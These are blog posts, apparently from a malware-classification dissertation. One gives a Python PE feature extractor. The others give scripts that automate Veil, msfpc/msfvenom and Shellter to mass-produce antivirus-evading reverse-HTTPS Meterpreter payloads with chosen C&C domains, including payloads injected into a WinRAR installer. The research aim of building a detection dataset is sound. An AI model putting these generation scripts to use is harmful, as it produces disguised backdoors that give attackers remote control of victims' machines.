Wednesday, August 29, 2018

Feature extraction of PEFiles using Python

This post serves as a reminder on how to perform feature extraction of PE binaries using Python.
The code uses the 2012 Adobe's Malware Classifier as a reference and modified accordingly for my own purpose. 
The code uses PEFile python module to read and work with PE files. 
 
My Purpose:
a) Extraction of PE file Header and Section information.
b) Compute MD5 sum of binary.
c) Save the information in a CSV file.

First import the required python library. 
import os
import pefile
import pandas as pd
import hashlib

Next define the function for computing md5 value given the filename. *Filename requires full path if binary is located in a separate directory from the python script.
def md5sum(filename, blocksize=65536):
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

Next define a python class to represent the PE binary file.
class PEFile:
    #representation of PE file
    def __init__(self, filename):
        with open(filename, "rb") as file_content:
            self.pe= pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename
        self.DebugSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].Size
        self.DebugRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].VirtualAddress
        self.ImageVersion = self.pe.OPTIONAL_HEADER.MajorImageVersion
        self.OSVersion = self.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
        self.ExportRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].VirtualAddress
        self.ExportSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].Size
        self.IATRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[12].VirtualAddress
        self.ResSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[2].Size
        self.LinkerVersion = self.pe.OPTIONAL_HEADER.MajorLinkerVersion
        self.VirtualSize2 = self.pe.sections[1].Misc_VirtualSize
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = self.pe.OPTIONAL_HEADER.SizeOfStackReserve
        self.Dll = self.pe.OPTIONAL_HEADER.DllCharacteristics
        self.pe.parse_data_directories()
        countf = 0
        countm = 0
        for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
          #print (entry.dll)
            countf += 1
            for imp in entry.imports:
                #print ('\t', hex(imp.address), imp.name)
                countm += 1
        self.ImportFunctionCount = countf
        self.ImportFunctionMethodCount = countm
        file_content.close()
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")
        
    def Construct(self):
        sample = {}
        for feature, value in self.__dict__.items():
            if(feature != "pe"):
                sample[feature] = value
        print ("Construct completed")
        return sample

Method to iterate through a directory for PE Files. PE Header and Section information are extracted and stored in a python dictionary and returned.
def pe2vec():
    #dataset is a python dictionary which store the key value mapping
    dataset = {}
    
    #Recursively search for files within a specified directory and its subdir
    directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"
    for subdir, dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                #read PE file using PEFILE module
                pe = PEFile(file_path)        
                # pe.construct returns a dictionary with features as key and feature value as value
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                print (e)
    return dataset

Method to save python dictionary returned by pe2vec() function to a CSV file.
def saveToCSV(dataset):
    df = pd.DataFrame(dataset)
    infected = df.transpose()  
    infected.to_csv('C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv',sep=',', encoding='utf-8')
    


Full Code is shown below:
import os
import pefile
import pandas as pd
import hashlib

def md5sum(filename, blocksize=65536):
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

class PEFile:
    #representation of PE file
    def __init__(self, filename):
        with open(filename, "rb") as file_content:
            self.pe= pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename
        self.DebugSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].Size
        self.DebugRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].VirtualAddress
        self.ImageVersion = self.pe.OPTIONAL_HEADER.MajorImageVersion
        self.OSVersion = self.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
        self.ExportRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].VirtualAddress
        self.ExportSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].Size
        self.IATRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[12].VirtualAddress
        self.ResSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[2].Size
        self.LinkerVersion = self.pe.OPTIONAL_HEADER.MajorLinkerVersion
        self.VirtualSize2 = self.pe.sections[1].Misc_VirtualSize
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = self.pe.OPTIONAL_HEADER.SizeOfStackReserve
        self.Dll = self.pe.OPTIONAL_HEADER.DllCharacteristics
        self.pe.parse_data_directories()
        countf = 0
        countm = 0
        for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
          #print (entry.dll)
            countf += 1
            for imp in entry.imports:
                #print ('\t', hex(imp.address), imp.name)
                countm += 1
        self.ImportFunctionCount = countf
        self.ImportFunctionMethodCount = countm
        file_content.close()
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")
        
    def Construct(self):
        sample = {}
        for feature, value in self.__dict__.items():
            if(feature != "pe"):
                sample[feature] = value
        print ("Construct completed")
        return sample
    
def pe2vec():
    #dataset is a python dictionary which store the key value mapping
    dataset = {}
    
    #Recursively search for files within a specified directory and its subdir
    directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"
    for subdir, dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                #read PE file using PEFILE module
                pe = PEFile(file_path)        
                # pe.construct returns a dictionary with features as key and feature value as value
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                print (e)
    return dataset
    
def saveToCSV(dataset):
    df = pd.DataFrame(dataset)
    infected = df.transpose()  
    infected.to_csv('C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv',sep=',', encoding='utf-8')
    
pedata = pe2vec()
saveToCSV(pedata)





Saturday, August 11, 2018

Automating generation of VEIL payloads

This post serves as a journal of the technique used for automating generation of VEIL payloads. 
https://github.com/Veil-Framework

Objective: Generation of 1000 VEIL payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: VEIL framework in itself is a payload generation framework designed for evasion of Anti-Virus. 

Overview:
1) On a Kali Linux VM
2) Install VEIL framework

apt update
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

3) Open gedit and copy the below python script. Save the script to veil directory (/usr/share/veil)

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

#read domain names to use
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
df.describe()
print ("Loaded domain name file")
print("")

correctmsg = "Metasploit Resource file written to:"
errmsg = "bignum too big to convert"

startfrom = 0

for index, row in df.iterrows():
 if startfrom > index:
  print ("skip: "+str(row[1]))
  continue

 attempt = 1
 #uncomment the 2 lines below to use the resolved ip address instead 
 try:
  addr = socket.gethostbyname(row[0])
  print(addr)
 except socket_error as serr:  
  if serr.errno == -2:
   print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.")
   row[0] = "127.0.0.1"

 command = "-t Evasion -p cs/meterpreter/rev_https.py --ip " + row[0] + " --port 443" 
 binaryname = str(row[1])+".exe"
 print (command)
 
 #set i to any positive number to start the loop  
 i = 9999
 x = -1
 while x == -1:
  proc = subprocess.Popen(['./Veil.py','-t','Evasion','-p','cs/meterpreter/rev_https.py','--ip',str(row[0]),'--port','443','-o',str(row[1])], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  tmp = proc.communicate()[0]
  x = tmp.find(correctmsg)
  #-1 represent errmsg is not found thus implying that crafting is successful
  i = tmp.find(errmsg)
  #print ("i value:" + str(i))

  if i != -1 :
   print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
   attempt = attempt + 1 
  if x == -1 :
   print ("error: " + tmp)
   attempt = attempt + 1 

 print ("Command: " + command + " is successful.")
 print ("Saving as :" + binaryname)
 #subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
 print ("Saved")
 print ("")
 

4) Create a csv file using excel with the following format and save it as website.csv: 


5) Execute the Python script 

cd /usr/share/veil
python veil_malware_generation_script.py

6) Generated malware are saved at /var/lib/veil/output/compiled

7) VEIL is really fast, about 20 minutes to generate the 1000 malware samples.

Wednesday, July 25, 2018

Automating generation of Metasploit payloads

This post serves as a journal of the technique used for automating generation of Metasploit payloads. 

Objective: Generation of 1000 Metasploit payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: Previously i used MSVenom Payload Creator (MSFPC) for quickly generating payloads. MSFPC is a wrapper class on top of MSFVenom. MSFPC is insufficient to meet my objective, thus i had to write a wrapper class on top of MSFPC. 

*So this is a wrapper on top of a wrapper. Technically MSFPC is redundant. 

Overview:
1) On a Kali Linux VM
2) Update Metasploit
apt update
apt install metasploit-framework

3) Install MSFPC
apt install -y msfpc

4) Open gedit and copy the below python script
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

#read domain names to use
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
df.describe()
print ("Loaded domain name file")
print("")

correctmsg = "Done"
errmsg = "bignum too big to convert"

startfrom = 2

for index, row in df.iterrows():
	if startfrom > index:
		print ("skip: "+str(row[1]))
		continue

	attempt = 1
	#uncomment the 2 lines below to use the resolved ip address instead 
	try:
		addr = socket.gethostbyname(row[0])
		print(addr)
	except socket_error as serr:		
		if serr.errno == -2:
			print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.")
			row[0] = "127.0.0.1"

	command = "windows " + row[0] + " https" 
	binaryname = str(row[1])+".exe"
	print (command)
	
	#set i to any positive number to start the loop 	
	i = 9999
	x = -1
	while x == -1:
		proc = subprocess.Popen(['msfpc', command], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
		tmp = proc.communicate()[0]
		x = tmp.find(correctmsg)
		#-1 represent errmsg is not found thus implying that crafting is successful
		i = tmp.find(errmsg)
		#print ("i value:" + str(i))

		if i != -1 :
			print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
			attempt = attempt + 1 
		if x == -1 :
			print ("error: " + tmp)
			attempt = attempt + 1 

	print ("Command: msfpc " + command + " is successful.")
	print ("Saving as :" + binaryname)
	subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
	print ("Saved")
	print ("")
	

5) Create a csv file using excel with the following format and save it as website.csv: 













6) Execute the Python script (*internet is needed as msfvenom will validate the LHOST domain name)

7) About 40mins for 100 binaries, 900 to go =)

Metasploit bignum too big to convert into `long' error

Background:
If you are having the following error, it might be that your Metasploit framework is outdated.
I was having this issue when i used Metasploit framework from a Kali 2017 vm image without updating it.


Solution:
1. Update the framework, the below command works on my Kali Linux.

apt update
apt install metasploit-framework

Wednesday, July 4, 2018

Automating generation of SHELLTER payloads

This post serves as a journal of the technique used for automating generation of SHELLTER payloads. 

Objective: Generation of 1000 SHELLTER payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: SHELLTER is an closed-source shellcode injection framework that performs dynamic PE infection based upon execution flow of the target application. This approach does not modify the original PE header thus allowing it to appear normal using static analysis. 

SHELLTER is a windows PE binary and can be found https://www.shellterproject.com/download/

It can be executed on Linux using WINE or directly in Windows. 

Challenge: I initially ran SHELLTER from Linux but have difficulty automating a WINE terminal. After researching on using PYTHON subprocess, i found it too much of a hassle to attempt redirection to and fro a WINE terminal from a Linux terminal.


Thus i ended up automating SHELLTER from native Windows instead. Autoit is a free software designed for creation of automated scripts. 


Overview of Technique:
1) Create a Win7 VM on VMWARE
2) Download SHELLTER 
3) Download and install Autoit 
4) Open Autoit SciTE script editor
5) Typed in the following script


#include <MsgBoxConstants.au3>;
#RequireAdmin

#include <FileConstants.au3>;
#include <MsgBoxConstants.au3>;
#include <WinAPIFiles.au3>;
#include <File.au3>;


;If IsAdmin() Then MsgBox($MB_SYSTEMMODAL, "", "The script is running with admin rights.")

Func Generate($vVar1 = "google.com")
 Run('.\shellter.exe')
 Sleep(1000)
 WinWaitActive("Shell7er", "", 1)

 ;automate
 Send("A{Enter}")
 Sleep(1000)

 ;Do not check update
 Send("N{Enter}")
 Sleep(1000)

 ;original binary path
 Send(".\wrar560.exe{Enter}")
 Sleep(35000)

 ;Stealth mode
 Send("Y{Enter}")
 Sleep(1000)

 ;payload selection
 Send("l{Enter}")
 Sleep(2000)
 Send("3{Enter}")
 Sleep(1000)

 ;domain name
 Send($vVar1)
 Send("{Enter}")
 Sleep(1000)

 ;port number
 Send("443{Enter}")
 Sleep(10000)

 Send("{Enter}")
EndFunc


Func print($test3)
 MsgBox($MB_SYSTEMMODAL, "", $test3)
EndFunc

$file = ".\website.csv"
FileOpen($file, 0)

;2 is first entry, 1 is the header
$StartFrom = 2

For $i = $StartFrom to _FileCountLines($file)
    $line = StringSplit(FileReadLine($file, $i),",")
 $domainName = $line[1]
 Generate($domainName)
 ;print($line[2])
 Sleep(3000)
 $sDestination = ".\malware\" & $line[2]
 ;MsgBox($MB_SYSTEMMODAL, "", $sDestination)
 FileMove(".\wrar560.exe", $sDestination, $FC_OVERWRITE)
 FileMove(".\Shellter_Backups\wrar560.exe", ".\wrar560.exe", $FC_OVERWRITE)
Next

FileClose($file)

6) Save the Autoit script in the same directory where Shellter.exe resides in.
7) Create a csv file using excel with the following format and save it as website.csv: 

8) I have chosen to pack winrar (wrar560.exe) with the payload, you may find it here https://www.rarlab.com/rar/wrar560.exe
9) Save wrar560.exe to the same directory as Shellter.exe
10) Execute the Autoit script 


Results: 
Took about 2 days to create over 900 malware samples. 100 more to go =)

Feel free to modify the script accordingly.